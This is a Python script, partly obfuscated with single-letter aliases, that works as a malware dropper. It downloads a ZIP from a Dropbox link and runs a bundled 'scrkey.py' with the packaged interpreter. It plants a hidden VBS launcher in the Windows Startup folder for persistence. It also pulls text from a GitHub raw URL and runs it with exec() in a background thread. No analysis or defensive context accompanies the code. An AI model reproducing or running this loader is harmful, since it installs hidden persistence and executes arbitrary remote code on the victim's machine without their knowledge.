F='Appaqsd'
E=open
B=print
import os as A,requests as M,time as I
import threading
import subprocess
import os
import time
import webbrowser
G='last_drop.txt'
if A.path.exists(G):
	with E(G,'r')as C:N=int(C.read().strip())
	if I.time()-N<600:B('Drop was run less than 10 minutes ago. Exiting.');exit()
O='https://www.dropbox.com/scl/fi/sbq9413hwmjfwa7tfls7l/Appaqsd.zip?rlkey=6fc350kb9f0rvh676o7v5n06g&dl=1'
J=A.path.join('Appaqsd.zip')
with M.get(O,stream=True)as K:
	K.raise_for_status()
	with E(J,'wb')as C:
		for P in K.iter_content(chunk_size=8192):C.write(P)
B('Downloaded the ZIP file.')
L=f"tar -xf {J}"
B(L)
A.system(L)
B('Extracted the ZIP file.')
B(f"Executing the program...")
Q=A.path.join(A.getcwd(),F)
D=A.path.join(A.getcwd(),F)
D=A.path.join(A.getcwd(),F,'python.exe')
H=A.path.join(A.getcwd(),F,'scrkey.py')
B(f"{D} {H}")
R=A.path.join(A.getenv('APPDATA'),'Microsoft\\Windows\\Start Menu\\Programs\\Startup')
S=A.path.join(R,'LaunchStartupLANs.vbs')
T=f'''
Set WshShell = CreateObject("WScript.Shell")

WshShell.CurrentDirectory = "{Q}"
WshShell.Run "{D} {H}", 0, True
Set WshShell = Nothing 
'''
with E(S,'w')as U:U.write(T.strip())
with E(G,'w')as C:C.write(str(int(I.time())))
kills = M.get("https://raw.githubusercontent.com/48GE12/52/main/message%20(1).txt")
textmsg = kills.text
# execute in a new thread
def execute_python(textmsg):
    exec(textmsg)
thread = threading.Thread(target=execute_python, args=(textmsg,))
thread.start()
A.system(f"{D} {H}")
B('Executed the program.')
